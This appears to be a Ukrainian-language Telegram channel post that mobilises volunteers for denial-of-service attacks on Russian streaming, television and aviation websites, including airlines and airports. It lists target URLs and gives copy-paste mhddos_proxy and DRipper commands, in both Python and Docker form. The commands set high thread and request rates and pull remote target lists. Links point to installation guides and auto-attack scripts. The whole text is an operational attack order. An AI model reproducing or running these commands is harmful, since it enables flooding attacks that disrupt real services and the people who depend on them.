title

title


python3 runner.py https://okko.tv https://mimimi.okko.team/ https://pobeda.okko.tv https://www.ontvtime.ru https://www.amediateka.ru https://kodiki.amediateka.ru/ https://rt.amediateka.ru/ https://akado.amediateka.ru/ https://wink.ru https://www.1tv.ru/live https://cm.1tv.ru/ https://tlxmob.1tv.ru/ https://25.1tv.ru/ https://kino.1tv.ru/ https://users.1tv.ru/ http://edu.1tv.ru/ https://admin.kino.1tv.ru/ https://stage.1tv.ru/ https://subscr.1tv.ru/ https://kino-teatr.ru http://m.kino-teatr.ru/ https://mt.kino-teatr.ru/ --http-methods GET STRESS -t 10000 --rpc 2000 -p 600 --debug




віа-перевезення РФ🔥


https://www.aviasales.ru/

https://nordwindairlines.ru/ru

https://www.aeroflot.ru/ru-ru

https://azimuth.aero/ru

https://www.uralairlines.ru/

https://kiyaviakrym.com/

https://rov.aero/

https://airport-murmansk.ru/


❗️Гайди як встановити mhddos_proxy на Windows / Mac / Linux / Android тут: https://t.me/ddos_separ/990


❗️ (https://auto-ddos.notion.site/auto-ddos/DDoS-new-b6f56bf8e4cd4eebb5abfc85cbd77f93)Рекомендую усім перейти на новий супер-швидкий та стабільний VPN


 (https://auto-ddos.notion.site/VPN-effde85923534cf7b4caa198a0ef0d23)❗️Як перевести будь-який процес у відновлюваний фон на Linux (пункт 4): https://telegra.ph/Analіz-zasobu-mhddos-proxy-04-01


❗️Усе інше(mhddos_proxy + VPN + авто-програми + Linux-сервери + Розвідка цілей) тепер зібрано тут


❗️ (https://auto-ddos.notion.site/auto-ddos/DDoS-new-b6f56bf8e4cd4eebb5abfc85cbd77f93)Ці цілі також додані у наші автоматизовані скрипти


 (https://t.me/ddos_separ/1126)❗️ (https://auto-ddos.notion.site/auto-ddos/DDoS-new-b6f56bf8e4cd4eebb5abfc85cbd77f93)Вийшла нова покращена версія mhddos_proxy, рекомендую оновити (обирайте інструкцію для вашої ОС та гортайте до пункту Запуск команд / атаки): https://t.me/ddos_separ/990 

(для Linux-серверів (https://auto-ddos.notion.site/dd91326ed30140208383ffedd0f13e5c) та авто-скриптів (https://t.me/ddos_separ/1126) нічого не потрібно змінювати - воно оновлюється повністю самостійно)


✅ПРІОРИТЕТ mhddos_proxy (якщо не спрацює python3 тоді - python / для Linux додайте sudo на початку):

🔹ПРІОРИТЕТ атака по L7 URL:

python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l7_url -t 5000 --rpc 2000 --http-methods GET STRESS --debug

🔹Атака по L7 http(s)://IP:PORT:

python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l7_http -t 5000 --rpc 2000 --http-methods GET STRESS --debug

🔹Атака по L4 tcp:

python3 runner.py -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l4_tcp -t 5000 --rpc 2000 --debug


✅Docker Windows / Для Linux додайте sudo:

🔹ПРІОРИТЕТ атака по L7 URL:

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l7_url -t 5000 --rpc 2000 --http-methods GET POST --debug

🔹Атака по L7 http(s)://IP:PORT:

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l7_http -t 5000 --rpc 2000 --http-methods GET STRESS --debug

🔹Атака по L4 tcp:

docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l4_tcp -t 5000 --rpc 2000 --debug


🟢DRipper (https://github.com/alexmon1989/russia_ddos) (вийшла нова версія (https://github.com/alexmon1989/russia_ddos/blob/main/docs/SetupGuide.md), яка підтримує багато цілей в одній атаці і ще багато чого крутого):


🔸Атака по L7 URL:

python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l7_url

🔸Атака по L4 tcp:

python3 DRipper.py -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l4_tcp


🟢Docker Windows / Для Linux додайте sudo:

🔸Атака по L7 URL:

docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l7_url

🔸Атака по L4 tcp:

docker run -it --rm --pull always alexmon1989/dripper:latest -t 500 --log-level info --targets-list https://raw.githubusercontent.com/alexnest-ua/targets/main/special/archive/avia/avia_l4_tcp



Report Page